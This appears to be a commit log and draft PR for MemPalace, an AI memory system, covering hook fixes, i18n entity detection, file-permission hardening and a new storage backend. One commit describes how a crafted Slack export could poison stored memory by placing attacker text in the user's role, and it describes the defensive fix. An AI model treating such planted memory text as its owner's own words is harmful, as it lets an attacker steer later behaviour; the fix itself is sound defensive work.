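The guard helper's contract, as stated in the commit above, can be sketched in a few lines (the shipped ``searcher._first_or_empty`` may differ cosmetically):

```python
# Sketch of the empty-result guard described above: returns [] for a
# missing key, empty outer list, [None], or [[]].
def first_or_empty(results, key):
    outer = results.get(key)
    if not outer:            # missing key or empty outer list
        return []
    inner = outer[0]
    return inner or []       # [None] and [[]] both collapse to []
```

Centralizing the guard means every caller gets the same "no results" shape instead of scattering ``IndexError`` try/excepts.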
The helper is conservative:

- only runs when <dir>/.git is present (no-op for non-git projects)
- skips entries already present (no duplicates)
- preserves existing .gitignore content
- handles files without trailing newlines

This does NOT relocate the files to ~/.mempalace/wings/<wing>/ as the issue's 'Expected' section proposes — that's a behavioral change with miner/config implications and warrants a separate design discussion. The gitignore safeguard removes the immediate risk without breaking any existing flow.

Tests: 5 cases in tests/test_init_gitignore_protection.py covering no-op, fresh creation, partial append, idempotency, and missing-newline edge case.

* fix(mcp): redirect stdout to stderr during import to protect JSON-RPC channel (#225) (#864)

* fix(mcp): redirect stdout to stderr during import to protect JSON-RPC channel (#225)

Fixes #225. Several transitive dependencies (chromadb, onnxruntime, posthog) print banners and warnings to stdout — sometimes at the C level — during the mcp_server import chain. Because the MCP protocol multiplexes JSON-RPC over stdio, any non-JSON output on stdout corrupted the message stream and broke Claude Desktop's parser with errors like:

    MCP mempalace: Unexpected token '*', "**********"... is not valid JSON
    MCP mempalace: Unexpected token 'E', "EP Error D"... is not valid JSON
    MCP mempalace: Unexpected token 'F', "Falling ba"... is not valid JSON

Reproduced on Windows 11 with mempalace 3.0.0 / Python 3.10 / Claude Desktop 1.1062.0.

Fix: at module load, redirect stdout to stderr at both the Python level (sys.stdout = sys.stderr) and the file-descriptor level (os.dup2(2, 1)) to catch C-level prints, while preserving the real stdout for later restore. main() calls _restore_stdout() right before entering the protocol loop so JSON-RPC responses still go to the real stdout.
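The conservative gitignore helper above can be sketched as follows. This is a hedged reconstruction of ``_ensure_mempalace_files_gitignored()``; the shipped helper's marker comment and exact logic may differ:

```python
from pathlib import Path

# Hedged sketch following the conservative rules listed above.
_FILES = ("mempalace.yaml", "entities.json")

def ensure_gitignored(project_dir):
    root = Path(project_dir)
    if not (root / ".git").exists():
        return                                   # no-op for non-git projects
    gitignore = root / ".gitignore"
    existing = gitignore.read_text() if gitignore.exists() else ""
    lines = set(existing.splitlines())
    missing = [f for f in _FILES if f not in lines]
    if not missing:
        return                                   # idempotent: nothing to add
    block = existing
    if block and not block.endswith("\n"):
        block += "\n"                            # missing-newline edge case
    block += "# MemPalace per-project files\n" + "\n".join(missing) + "\n"
    gitignore.write_text(block)
```

A second invocation finds both filenames already present and returns without touching the file, which is what the idempotency test in the commit pins.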
Adds tests/test_mcp_stdio_protection.py with three regression tests:

- module-level redirect is in place after import
- _restore_stdout() restores the original stdout (idempotent)
- 'python -m mempalace.mcp_server' with empty stdin emits no stdout

* style: reformat with ruff 0.4 (CI version) for #225

* fix(hooks): stop precompact hook from blocking compaction (#856, #858) (#863)

* fix(hooks): stop precompact hook from blocking compaction

The precompact hook unconditionally returned {"decision": "block"}, which in Claude Code means "cancel compaction" with no retry mechanism. This made /compact permanently broken for all plugin users.

Changed hook_precompact() to mine the transcript synchronously (so data lands before compaction) and return {"decision": "allow"}. This matches the standalone bash hook in hooks/ which already uses allow.

Also extracted _get_mine_dir() and _mine_sync() helpers so precompact can mine from the transcript directory, not just MEMPAL_DIR.

Stop hook behavior is unchanged -- left for #673 which implements the full silent save path.

Closes #856, closes #858.

* fix: use empty JSON instead of invalid "allow" decision value

Claude Code only recognizes "block" as a top-level decision value. "allow" is a permissionDecision value for PreToolUse hooks, not a valid top-level decision. The correct way to not block is to return empty JSON.

Caught by #872.

* feat: include created_at timestamp in search results (#846)

* feat: include created_at timestamp in search results (closes #465)

Surface the existing filed_at metadata as created_at in search result objects returned by search_memories(). Enables temporal reasoning over search hits without additional queries.
* feat: add fallback for missing filed_at metadata

* fix: add provenance header and speaker IDs to Slack transcript imports (#815)

* fix: add provenance header and speaker IDs to Slack transcript imports

Slack exports are multi-party chats where no speaker is inherently the "user" or "assistant". The parser previously assigned these roles purely by position, allowing a crafted export to place attacker text in the "user" role — making it appear as the memory owner's words in all future retrieval (data poisoning via stored memory).

Changes:
- Add provenance header marking Slack transcripts as multi-party with positional (unverified) role assignment
- Prefix each message with the original speaker ID ([U1], [U2], etc.) so downstream consumers can distinguish authors
- Keep user/assistant role alternation for exchange-pair chunking compatibility with convo_miner.py

Tests:
- Provenance header presence and content
- Speaker ID preservation in output
- Attacker-first-message attribution verification

Refs: MemPalace/mempalace#809

* fix: move Slack provenance to footer, sanitize speaker IDs, extract constant

- Move provenance notice from header to footer to prevent it becoming a standalone ChromaDB drawer via paragraph chunking on exports with fewer than 3 exchange pairs (violates the verbatim-always principle)
- Sanitize speaker user_id/username: strip brackets, newlines, and control characters to prevent chunk-boundary injection via crafted Slack exports
- Extract the header string to a _SLACK_PROVENANCE_FOOTER module constant, consistent with the _TOOL_RESULT_* constants pattern; tests import it instead of duplicating the literal

Refs: MemPalace/mempalace#809

* fix: restrict file permissions on sensitive palace data (#814)

* fix: restrict file permissions on sensitive palace data

On Linux with default umask (022), several files and directories containing personal data were created world-readable.
This patch applies chmod 0o700 to directories and 0o600 to files immediately after creation, wrapped in try/except for Windows compatibility.

Files hardened:
- hooks_cli.py: hook_state/ directory and hook.log
- entity_registry.py: entity_registry.json (names, relationships)
- knowledge_graph.py: knowledge_graph.sqlite3 parent directory
- exporter.py: export output directory and wing subdirectories
- config.py: people_map.json (name mappings)
- mcp_server.py: WAL file creation uses atomic os.open (TOCTOU fix)

Refs: MemPalace/mempalace#809

* fix: avoid redundant chmod calls on hot paths

- hooks_cli.py: chmod STATE_DIR and hook.log only on first creation, not on every _log() call (hooks fire on every Stop event)
- exporter.py: track created wing dirs to skip redundant makedirs + chmod on the same directory across batches
- mcp_server.py: remove redundant _WAL_FILE.chmod after os.open already set mode=0o600 atomically

Refs: MemPalace/mempalace#809

* test: add palace_graph tunnel helper coverage

Adds focused tests for explicit tunnel helpers in `mempalace/palace_graph.py`. Covered:
- `_load_tunnels`
- `_save_tunnels`
- `create_tunnel`
- `list_tunnels`
- `delete_tunnel`
- `follow_tunnels`

* refactor(entity_detector): make multi-language extensible via i18n JSON

Move all entity-detection lexical patterns (person verbs, pronouns, dialogue markers, project verbs, stopwords, candidate character class) out of hardcoded module-level constants and into the entity section of each locale's JSON in mempalace/i18n/. Adds a languages parameter to every public function so callers union patterns across the desired locales. The default stays ("en",), so all existing callers and tests behave unchanged.
Also adds:
- get_entity_patterns(langs) helper in mempalace/i18n/ that merges patterns across requested languages, dedupes lists, unions stopwords, and falls back to English for unknown locales
- MempalaceConfig.entity_languages property + setter, with env var override (MEMPALACE_ENTITY_LANGUAGES, comma-separated)
- `mempalace init --lang en,pt-br` flag (persists to config.json)
- Per-language candidate_pattern so non-Latin scripts (Cyrillic, Devanagari, CJK) can register their own character classes instead of being silently dropped by the ASCII-only [A-Z][a-z]+ default
- _build_patterns LRU cache keyed by (name, languages) so multi-language callers don't poison each other's cache slots

Why now: the open language PRs (#760 ru, #773 hi, #778 id, #907 it) only add CLI strings via mempalace/i18n/. PR #156 (pt-br) is the first that needed entity_detector changes and inlined a _PTBR variant of every constant. That doesn't scale past 2-3 languages — every text gets checked against every language's patterns regardless of relevance, and candidate extraction still drops accented and non-Latin names. This PR sets the standard so future locale contributors only edit one JSON file (no Python changes), and entity detection scales linearly with how many languages a user actually enabled, not how many ship.

* test: document orphan-locale recovery for _temp_locale helper

* feat: add Russian language support to i18n module

Add ru.json with full Russian translations for CLI strings, palace terminology, the AAAK compression instruction, and regex patterns for topic/action extraction with Cyrillic character classes. No code changes needed -- the i18n module auto-discovers language files via *.json glob in the i18n directory.

* feat(i18n): add entity detection section to Russian locale

Cyrillic candidate/multi-word patterns, person-verb patterns (сказал, спросил, ответил, etc.), pronoun patterns, dialogue markers, direct address, and Russian stopwords.
Follows the i18n entity framework from #911.

* fix(i18n): apply review feedback on ru.json (#760)

- mine_skip: "повторной раскопки" -> "повторной обработки"
- quote_pattern: add Russian guillemet quotes «»

Co-Authored-By: almirus <[email protected]>

* feat(i18n): expand Russian entity stopwords with prepositions and conjunctions

Adds 34 prepositions and conjunctions to reduce false positives in entity detection when these words appear sentence-initial.

Co-Authored-By: almirus <[email protected]>

* feat: add Italian i18n support

* feat: add Italian entity patterns

* feat(i18n): update hi.json with the entity infra: pronoun_patterns, dialogue_patterns, direct_address_pattern, project_verb_patterns, and stopwords

* feat(i18n): add Brazilian Portuguese locale with entity detection (closes #117)

CLI strings, AAAK instruction, regex patterns, and an entity section with person-verb, pronoun, dialogue, and candidate patterns for Latin+diacritics names (Joao, Ines, Angela). Follows the i18n entity framework from #911.

* fix(i18n): address review feedback on pt-br.json

- dialogue_patterns[0]: remove stray `\"` before `>` (fixes markdown quote matching)
- entity stopwords: add 40 prepositions, conjunctions, and common words to reduce false positives
- pronoun_patterns: add 2nd-person (você/vocês) and possessives (seu/sua/seus/suas)

* feat(cli): add version display and --version flag to CLI

Introduces a version label to the command-line interface, displaying the current MemPalace version in the help text. Adds a `--version` flag so users can check the installed version and exit.

* fix(i18n): resolve language codes case-insensitively (#927)

BCP 47 language tags are case-insensitive (RFC 5646 §2.1.1) but the locale files mix conventions (pt-br.json vs zh-CN.json). On case-sensitive filesystems, '--lang PT-BR' or '--lang zh-cn' silently missed the file, _load_entity_section returned {}, and entity detection ran in English with no warning.
The cache key in get_entity_patterns was built from raw input, so ('PT-BR',) and ('pt-br',) produced two distinct entries, both wrong.

Add _canonical_lang(lang) that resolves any casing to the on-disk filename stem via lowercase comparison, and route load_lang, _load_entity_section, and the cache key through it.

Closes #927

* fix(i18n): use Optional[str] for Python 3.9 compatibility

PEP 604 union syntax (str | None) requires Python 3.10+. The project supports 3.9 per the CI matrix, so use typing.Optional instead.

* fix(entity_detector): script-aware word boundaries for combining-mark scripts

Python's \b is a \w/non-\w transition. Devanagari vowel signs (matras) like ा ी ु are Unicode category Mc (Mark, Spacing Combining) — not \w. This means \b splits mid-word on every matra: names like अनीता (Anita) truncate to अनीत, and person-verb patterns like \bराज\s+ने\s+कहा\b never match because \b fails after the final matra of कहा. The same issue affects Arabic, Hebrew, Thai, Tamil, and every other script whose words contain combining marks.

Fix: locales with combining-mark scripts declare a boundary_chars field in their entity section (e.g. "\\w\\u0900-\\u097F" for Hindi). The i18n loader replaces every \b in that locale's patterns with a script-aware lookaround that treats the declared characters as "inside-word", and pre-wraps candidate/multi_word patterns with the same boundary. Default behavior (no boundary_chars) keeps standard \b — en, pt-br, ru, it are unchanged.

Changes:
- mempalace/i18n/__init__…
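The `\b` rewrite described in that commit can be approximated with a pair of lookarounds. The helper below is an illustrative reconstruction (the real loader lives in mempalace/i18n/, and its name may differ):

```python
import re

def script_aware_boundary(pattern: str, boundary_chars: str) -> str:
    """Replace every \\b in `pattern` with a lookaround pair that treats
    `boundary_chars` (a regex character-class body, e.g. "\\w\\u0900-\\u097F"
    for Hindi) as inside-word characters."""
    b = (
        rf"(?:(?<![{boundary_chars}])(?=[{boundary_chars}])"   # word start
        rf"|(?<=[{boundary_chars}])(?![{boundary_chars}]))"    # word end
    )
    return pattern.replace(r"\b", b)

# Standard \b fails after the final matra of अनीता (category Mc, not \w);
# the rewritten pattern matches the whole name.
hindi = r"\w\u0900-\u097F"
pattern = script_aware_boundary(r"\bअनीता\b", hindi)
```

Because the declared class includes the full Devanagari block, matras count as inside-word, so the synthetic boundary fires at the space after the name instead of splitting mid-word.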
Summary
Exploratory proof-of-concept for replacing ChromaDB with a bespoke storage layer designed around the palace model. Ships as a new
`palace_store/` package + a `palace_store.compat` shim that's wire-compatible with `chromadb.PersistentClient` for the narrow surface mempalace uses. Opt-in via `MEMPAL_STORAGE=palace_store` — default behavior is unchanged.

This is a draft PR — marking for discussion before any merge consideration. The goal is to show the storage-layer design works end-to-end under the real mempalace test suite, reproduces the 96.6% LongMemEval headline byte-for-byte, and opens a runway for faster / smaller / more robust storage if the approach is worth pursuing.
Why
N × 1536 B for f32. Eval improvements (hybrid BM25, reranking, etc.) are deliberately out of scope for this PR. The contract is byte-equivalent retrieval quality, with measurable wins on storage-layer metrics only.
Correctness
Under `MEMPAL_STORAGE=palace_store`, the drop-in preserves mempalace's headline number (96.6% R@5) to the third decimal, and every one of the 500 LongMemEval questions places the correct session at the exact same rank in both backends.
Performance (100k drawers, 25 wings, warm pages, p50 query)
Full matrix across small (1k) → huge (1M) lives in
`benchmarks/storage/`. See also the standalone benchmark suite below.

Design
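Condensed into code, the wing+room query path detailed below looks roughly like this (illustrative names, assuming numpy; the real implementation is in `palace_store/store.py`):

```python
from typing import Optional

import numpy as np

def query_wing(shard: np.ndarray,     # (N, dim) float32, L2-normalized rows
               room_ids: np.ndarray,  # (N,) int32, parallel to shard rows
               q: np.ndarray,         # (dim,) float32, L2-normalized
               room_id: Optional[int] = None,
               k: int = 10):
    """Exact cosine top-k within one wing shard."""
    if room_id is not None:
        # Structural room filter: a single integer compare, not string equality.
        rows = np.flatnonzero(room_ids == room_id)
    else:
        rows = np.arange(shard.shape[0])
    sims = shard[rows] @ q           # matrix-vector product (BLAS sgemv path)
    top = np.argsort(-sims)[:k]      # exact top-k: no ANN approximation
    return rows[top], sims[top]
```

With rows and query L2-normalized, the dot product equals cosine similarity, which is why recall is exact by construction rather than approximate.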
Shard-per-wing flat brute-force. Each wing gets its own append-only fixed-stride f32 file under `vectors/{wing}.vec`. The mempalace hot path is wing+room filtered search, so sharding by wing turns the wing filter into O(1) shard selection instead of an O(N) HNSW post-filter. Within a shard we do exact cosine via BLAS `sgemv` — no ANN approximation, recall is bit-equivalent to ChromaDB by construction.

Room as structural int filter. Room labels live in a per-wing `int32` array parallel to shard rows, backed by a `room_ids` SQLite table that assigns stable ids on first use. The query path does `room_ids == target_id` (a single SIMD integer compare) instead of the previous `<U128 ==` string comparison that profiling showed cost 100-150 µs per query at 100k — now ~2 µs.

BLAS thread limit. At mempalace shard sizes (typically 4000 rows × 384 dims per sgemv), OpenBLAS's per-call thread-spawn/sync overhead dominates compute by 3-4×. PalaceStore enters `threadpoolctl.threadpool_limits(limits=1)` once at store construction (not per-query, to avoid the ~20 µs context-manager overhead at small scale) and holds it for the store's lifetime, restored on `close()`. This is the single biggest perf knob for the f32 path. Requires `threadpoolctl` — installed via the `palace-parallel` extra, or falls back to a one-shot warning if missing.

Opt-in shard parallelism. With `parallel_query=True` the store lazy-creates a `ThreadPoolExecutor` and dispatches shards across workers. Gated on `len(wings) ≥ 4` to avoid the ~100 µs per-task dispatch overhead hurting small-scale queries. `max_workers` defaults to `min(8, cpu_count)` because shard-level matmul is memory-bandwidth bound past ~6 concurrent sgemvs. Stacks on top of the BLAS-limit win to give ~2× additional speedup at 100k+ unfiltered queries.

int8 quantized variant. `PalaceStore(..., dtype="int8")` stores per-row-scale quantized vectors — 4× smaller on disk, ~2× slower queries (numpy has no BLAS int8 path), 99.1% top-k overlap with exact cosine on random unit vectors. An honest disk/speed tradeoff, not a recall claim.

What's in the PR
How to try it
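A hedged sketch, assuming only the `MEMPAL_STORAGE` opt-in and the `mempalace mine` command named elsewhere in this PR (the project path is illustrative):

```shell
# default: unchanged ChromaDB backend
mempalace mine ./my-project

# opt in to the PalaceStore backend for this invocation only
MEMPAL_STORAGE=palace_store mempalace mine ./my-project
```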
Intentional non-goals / deferred
Dependencies
One new optional dependency:
`threadpoolctl>=3.1` via the `palace-parallel` extra. Used to scope BLAS thread count inside PalaceStore's query path. Without it, palace_store still runs but emits a one-shot warning because it can't apply the 3-4× BLAS-limit speedup. No hard dependencies added to the core package.

Open questions for reviewers
- `palace_store` as a top-level package sibling of `mempalace`, or nested inside `mempalace/storage/`? Current choice: top-level, because the library is independently usable and shouldn't leak mempalace internals.
- `MEMPAL_STORAGE` unset: default to `chromadb` (current, zero-risk) or auto-detect based on which packages are installed? Current leans conservative.

Test plan
`mempalace mine <dir>` on both backends